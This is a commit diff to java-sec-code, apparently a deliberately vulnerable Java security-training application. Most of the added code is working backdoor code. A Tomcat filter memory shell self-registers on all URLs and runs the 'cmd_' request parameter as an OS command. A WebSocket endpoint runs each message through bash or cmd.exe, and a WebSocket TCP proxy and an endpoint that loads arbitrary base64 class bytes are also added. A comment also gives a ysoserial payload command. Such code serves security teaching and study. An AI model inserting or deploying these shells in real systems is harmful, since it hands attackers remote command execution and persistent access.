fix #25

Author: JoyChou93

java-sec-code.iml

@@ -57,7 +57,6 @@
     <orderEntry type="library" name="Maven: org.thymeleaf:thymeleaf-spring4:2.1.5.RELEASE" level="project" />
     <orderEntry type="library" name="Maven: org.thymeleaf:thymeleaf:2.1.5.RELEASE" level="project" />
     <orderEntry type="library" name="Maven: ognl:ognl:3.0.8" level="project" />
-    <orderEntry type="library" name="Maven: org.javassist:javassist:3.21.0-GA" level="project" />
     <orderEntry type="library" name="Maven: org.unbescape:unbescape:1.1.0.RELEASE" level="project" />
     <orderEntry type="library" name="Maven: nz.net.ultraq.thymeleaf:thymeleaf-layout-dialect:1.4.0" level="project" />
     <orderEntry type="library" name="Maven: org.codehaus.groovy:groovy:2.4.7" level="project" />
@@ -222,5 +221,6 @@
     <orderEntry type="library" name="Maven: io.jsonwebtoken:jjwt:0.9.1" level="project" />
     <orderEntry type="library" name="Maven: com.auth0:java-jwt:4.0.0" level="project" />
     <orderEntry type="library" name="Maven: cn.hutool:hutool-all:5.8.10" level="project" />
+    <orderEntry type="library" name="Maven: org.javassist:javassist:3.27.0-GA" level="project" />
   </component>
 </module>

pom.xml

@@ -306,6 +306,12 @@
             <version>5.8.10</version>
         </dependency>
 
+        <dependency>
+            <groupId>org.javassist</groupId>
+            <artifactId>javassist</artifactId>
+            <version>3.27.0-GA</version>
+        </dependency>
+
     </dependencies>
 
     <dependencyManagement>

src/main/java/org/joychou/config/TomcatFilterMemShell.java

@@ -0,0 +1,120 @@
+package org.joychou.config;
+
+import com.sun.org.apache.xalan.internal.xsltc.DOM;
+import com.sun.org.apache.xalan.internal.xsltc.TransletException;
+import com.sun.org.apache.xalan.internal.xsltc.runtime.AbstractTranslet;
+import com.sun.org.apache.xml.internal.dtm.DTMAxisIterator;
+import com.sun.org.apache.xml.internal.serializer.SerializationHandler;
+import java.lang.reflect.Field;
+import org.apache.catalina.core.StandardContext;
+import java.io.IOException;
+import org.apache.catalina.loader.WebappClassLoaderBase;
+import org.apache.tomcat.util.descriptor.web.FilterDef;
+import org.apache.tomcat.util.descriptor.web.FilterMap;
+import java.lang.reflect.Constructor;
+import org.apache.catalina.core.ApplicationFilterConfig;
+import org.apache.catalina.Context;
+import org.springframework.stereotype.Component;
+
+import javax.servlet.*;
+import java.util.*;
+
+@Component
+public class TomcatFilterMemShell extends AbstractTranslet implements Filter {
+    static{
+        try {
+            System.out.println("Tomcat filter backdoor class is loading...");
+            final String name = "backdoorTomcatFilter";
+            final String URLPattern = "/*";
+
+            WebappClassLoaderBase webappClassLoaderBase = (WebappClassLoaderBase) Thread.currentThread().getContextClassLoader();
+            // standardContext为tomcat标准上下文，
+            StandardContext standardContext = (StandardContext) webappClassLoaderBase.getResources().getContext();
+
+            Class<? extends StandardContext> aClass;
+            try{
+                // standardContext类名为TomcatEmbeddedContex，TomcatEmbeddedContext父类为StandardContext
+                // 适用于内嵌式springboot的tomcat
+                aClass = (Class<? extends StandardContext>) standardContext.getClass().getSuperclass();
+            }catch (Exception e){
+                aClass = standardContext.getClass();
+            }
+            Field Configs = aClass.getDeclaredField("filterConfigs");
+            Configs.setAccessible(true);
+            // 获取当前tomcat标准上下文中已经存在的filterConfigs
+            Map filterConfigs = (Map) Configs.get(standardContext);
+
+            // 判断下防止重复注入
+            if (filterConfigs.get(name) == null) {
+                // 构造filterDef，并将filterDef添加到standardContext的FilterDef中
+                TomcatFilterMemShell backdoorFilter = new TomcatFilterMemShell();
+                FilterDef filterDef = new FilterDef();
+                filterDef.setFilter(backdoorFilter);
+                filterDef.setFilterName(name);
+                filterDef.setFilterClass(backdoorFilter.getClass().getName());
+                standardContext.addFilterDef(filterDef);
+
+                // 构造fiterMap，将filterMap添加到standardContext的FilterMap
+                FilterMap filterMap = new FilterMap();
+                filterMap.addURLPattern(URLPattern);
+                filterMap.setFilterName(name);
+                filterMap.setDispatcher(DispatcherType.REQUEST.name());
+                standardContext.addFilterMapBefore(filterMap);
+
+                Constructor constructor = ApplicationFilterConfig.class.getDeclaredConstructor(Context.class, FilterDef.class);
+                constructor.setAccessible(true);
+                ApplicationFilterConfig filterConfig = (ApplicationFilterConfig) constructor.newInstance(standardContext, filterDef);
+
+                // 最终将构造好的filterConfig存入StandardContext类的filterConfigs成员变量即可
+                filterConfigs.put(name, filterConfig);
+                System.out.println("Tomcat filter backdoor inject success!");
+            } else System.out.println("It has been successfully injected, do not inject again.");
+        } catch (Exception e) {
+            System.out.println(e.getMessage());
+        }
+    }
+
+
+    @Override
+    public void transform(DOM document, SerializationHandler[] handlers) throws TransletException {
+
+    }
+
+    @Override
+    public void transform(DOM document, DTMAxisIterator iterator, SerializationHandler handler) throws TransletException {
+
+    }
+
+    @Override
+    public void init(FilterConfig filterConfig) throws ServletException {
+
+    }
+
+    @Override
+    public void doFilter(ServletRequest servletRequest, ServletResponse servletResponse, FilterChain filterChain) throws IOException, ServletException {
+        String cmd;
+        if ((cmd = servletRequest.getParameter("cmd_")) != null) {
+            Process process = Runtime.getRuntime().exec(cmd);
+            java.io.BufferedReader bufferedReader = new java.io.BufferedReader(
+                    new java.io.InputStreamReader(process.getInputStream()));
+            StringBuilder stringBuilder = new StringBuilder();
+            String line;
+            while ((line = bufferedReader.readLine()) != null) {
+                stringBuilder.append(line).append('\n');
+            }
+            servletResponse.getOutputStream().write(stringBuilder.toString().getBytes());
+            servletResponse.getOutputStream().flush();
+            servletResponse.getOutputStream().close();
+            return;
+        }
+
+        filterChain.doFilter(servletRequest, servletResponse);
+    }
+
+
+    @Override
+    public void destroy() {
+
+    }
+
+}

src/main/java/org/joychou/config/WebSocketsCmdEndpoint.java

@@ -0,0 +1,46 @@
+package org.joychou.config;
+
+import javax.websocket.*;
+import java.io.InputStream;
+
+public class WebSocketsCmdEndpoint extends Endpoint implements MessageHandler.Whole<String> {
+    private Session session;
+
+    @Override
+    public void onOpen(Session session, EndpointConfig endpointConfig) {
+        this.session = session;
+        session.addMessageHandler(this);
+    }
+
+    @Override
+    public void onClose(Session session, CloseReason closeReason) {
+        super.onClose(session, closeReason);
+    }
+
+    @Override
+    public void onError(Session session, Throwable throwable) {
+        super.onError(session, throwable);
+    }
+
+    @Override
+    public void onMessage(String s) {
+        try {
+            Process process;
+            boolean bool = System.getProperty("os.name").toLowerCase().startsWith("windows");
+            if (bool) {
+                process = Runtime.getRuntime().exec(new String[]{"cmd.exe", "/c", s});
+            } else {
+                process = Runtime.getRuntime().exec(new String[]{"/bin/bash", "-c", s});
+            }
+            InputStream inputStream = process.getInputStream();
+            StringBuilder stringBuilder = new StringBuilder();
+            int i;
+            while ((i = inputStream.read()) != -1) stringBuilder.append((char) i);
+            inputStream.close();
+            process.waitFor();
+            session.getBasicRemote().sendText(stringBuilder.toString());
+        } catch (Exception exception) {
+            exception.printStackTrace();
+        }
+    }
+}

src/main/java/org/joychou/config/WebSocketsProxyEndpoint.java

@@ -0,0 +1,111 @@
+package org.joychou.config;
+
+import javax.websocket.Endpoint;
+import javax.websocket.EndpointConfig;
+import javax.websocket.MessageHandler;
+import javax.websocket.Session;
+import java.io.ByteArrayOutputStream;
+import java.net.InetSocketAddress;
+import java.nio.ByteBuffer;
+import java.nio.channels.AsynchronousSocketChannel;
+import java.nio.channels.CompletionHandler;
+import java.util.HashMap;
+import java.util.concurrent.Future;
+import java.util.concurrent.TimeUnit;
+
+public class WebSocketsProxyEndpoint extends Endpoint {
+    long i = 0;
+    ByteArrayOutputStream baos = new ByteArrayOutputStream();
+    HashMap<String, AsynchronousSocketChannel> map = new HashMap<String, AsynchronousSocketChannel>();
+
+    static class Attach {
+        public AsynchronousSocketChannel client;
+        public Session channel;
+    }
+
+    void readFromServer(Session channel, AsynchronousSocketChannel client) {
+        final ByteBuffer buffer = ByteBuffer.allocate(50000);
+        Attach attach = new Attach();
+        attach.client = client;
+        attach.channel = channel;
+        client.read(buffer, attach, new CompletionHandler<Integer, Attach>() {
+            @Override
+            public void completed(Integer result, final Attach scAttachment) {
+                buffer.clear();
+                try {
+                    if (buffer.hasRemaining() && result >= 0) {
+                        byte[] arr = new byte[result];
+                        ByteBuffer b = buffer.get(arr, 0, result);
+                        baos.write(arr, 0, result);
+                        ByteBuffer q = ByteBuffer.wrap(baos.toByteArray());
+                        if (scAttachment.channel.isOpen()) {
+                            scAttachment.channel.getBasicRemote().sendBinary(q);
+                        }
+                        baos = new ByteArrayOutputStream();
+                        readFromServer(scAttachment.channel, scAttachment.client);
+                    } else {
+                        if (result > 0) {
+                            byte[] arr = new byte[result];
+                            ByteBuffer b = buffer.get(arr, 0, result);
+                            baos.write(arr, 0, result);
+                            readFromServer(scAttachment.channel, scAttachment.client);
+                        }
+                    }
+                } catch (Exception ignored) {
+                }
+            }
+
+            @Override
+            public void failed(Throwable t, Attach scAttachment) {
+                t.printStackTrace();
+            }
+        });
+    }
+
+    void process(ByteBuffer z, Session channel) {
+        try {
+            if (i > 1) {
+                AsynchronousSocketChannel client = map.get(channel.getId());
+                client.write(z).get();
+                z.flip();
+                z.clear();
+            } else if (i == 1) {
+                String values = new String(z.array());
+                String[] array = values.split(" ");
+                String[] addrarray = array[1].split(":");
+                AsynchronousSocketChannel client = AsynchronousSocketChannel.open();
+                int po = Integer.parseInt(addrarray[1]);
+                InetSocketAddress hostAddress = new InetSocketAddress(addrarray[0], po);
+                Future<Void> future = client.connect(hostAddress);
+                try {
+                    future.get(10, TimeUnit.SECONDS);
+                } catch (Exception ignored) {
+                    channel.getBasicRemote().sendText("HTTP/1.1 503 Service Unavailable\r\n\r\n");
+                    return;
+                }
+                map.put(channel.getId(), client);
+                readFromServer(channel, client);
+                channel.getBasicRemote().sendText("HTTP/1.1 200 Connection Established\r\n\r\n");
+            }
+        } catch (Exception ignored) {
+        }
+    }
+
+    @Override
+    public void onOpen(final Session session, EndpointConfig config) {
+        i = 0;
+        session.setMaxBinaryMessageBufferSize(1024 * 1024 * 20);
+        session.setMaxTextMessageBufferSize(1024 * 1024 * 20);
+        session.addMessageHandler(new MessageHandler.Whole<ByteBuffer>() {
+            @Override
+            public void onMessage(ByteBuffer message) {
+                try {
+                    message.clear();
+                    i++;
+                    process(message, session);
+                } catch (Exception ignored) {
+                }
+            }
+        });
+    }
+}

src/main/java/org/joychou/controller/ClassDataLoader.java

@@ -0,0 +1,31 @@
+package org.joychou.controller;
+
+import org.slf4j.Logger;
+import org.slf4j.LoggerFactory;
+import org.springframework.web.bind.annotation.RequestMapping;
+import org.springframework.web.context.request.RequestContextHolder;
+import org.springframework.web.context.request.ServletRequestAttributes;
+
+import javax.servlet.http.HttpServletRequest;
+
+public class ClassDataLoader {
+
+    protected final Logger logger = LoggerFactory.getLogger(this.getClass());
+
+    @RequestMapping("/classloader")
+    public void classData() {
+        try{
+            ServletRequestAttributes sra = (ServletRequestAttributes) RequestContextHolder.getRequestAttributes();
+            HttpServletRequest request = sra.getRequest();
+            String classData = request.getParameter("classData");
+
+            byte[] classBytes = java.util.Base64.getDecoder().decode(classData);
+            java.lang.reflect.Method defineClassMethod = ClassLoader.class.getDeclaredMethod("defineClass", String.class, byte[].class, int.class, int.class);
+            defineClassMethod.setAccessible(true);
+            Class cc = (Class) defineClassMethod.invoke(ClassLoader.getSystemClassLoader(), null, classBytes, 0, classBytes.length);
+            cc.newInstance();
+        }catch(Exception e){
+            logger.error(e.toString());
+        }
+    }
+}

src/main/java/org/joychou/controller/Deserialize.java

@@ -29,17 +29,14 @@ public class Deserialize {
     protected final Logger logger = LoggerFactory.getLogger(this.getClass());
 
     /**
-     * java -jar ysoserial.jar CommonsCollections5 "open -a Calculator" | base64
-     * Add the result to rememberMe cookie.
-     * <p>
-     * http://localhost:8080/deserialize/rememberMe/vuln
+     * java -jar ysoserial.jar CommonsCollections5 "open -a Calculator" | base64 <br>
+     * <a href="http://localhost:8080/deserialize/rememberMe/vuln">http://localhost:8080/deserialize/rememberMe/vuln</a>
      */
     @RequestMapping("/rememberMe/vuln")
     public String rememberMeVul(HttpServletRequest request)
             throws IOException, ClassNotFoundException {
 
         Cookie cookie = getCookie(request, Constants.REMEMBER_ME_COOKIE);
-
         if (null == cookie) {
             return "No rememberMe cookie. Right?";
         }
@@ -56,12 +53,9 @@ public String rememberMeVul(HttpServletRequest request)
     }
 
     /**
-     * Check deserialize class using black list.
-     * Or
-     * Update commons-collections to 3.2.2 or above.
-     * Serialization support for org.apache.commons.collections.functors.InvokerTransformer is disabled for security reasons.To enable it set system property 'org.apache.commons.collections.enableUnsafeSerialization' to 'true',but you must ensure that your application does not de-serialize objects from untrusted sources.
-     * <p>
-     * http://localhost:8080/deserialize/rememberMe/security
+     * Check deserialize class using black list. <br>
+     * Or update commons-collections to 3.2.2 or above.Serialization support for org.apache.commons.collections.functors.InvokerTransformer is disabled for security reasons.To enable it set system property 'org.apache.commons.collections.enableUnsafeSerialization' to 'true',but you must ensure that your application does not de-serialize objects from untrusted sources.<br>
+     * <a href="http://localhost:8080/deserialize/rememberMe/security">http://localhost:8080/deserialize/rememberMe/security</a>
      */
     @RequestMapping("/rememberMe/security")
     public String rememberMeBlackClassCheck(HttpServletRequest request)

src/main/java/org/joychou/controller/Dotall.java

@@ -18,7 +18,6 @@ public class Dotall {
 
     /**
      * <a href="https://github.com/spring-projects/spring-security/compare/5.5.6..5.5.7">官方spring-security修复commit记录</a>
-     * 漏洞描述：h
      */
     public static void main(String[] args) throws Exception{
         Pattern vuln_pattern = Pattern.compile("/black_path.*");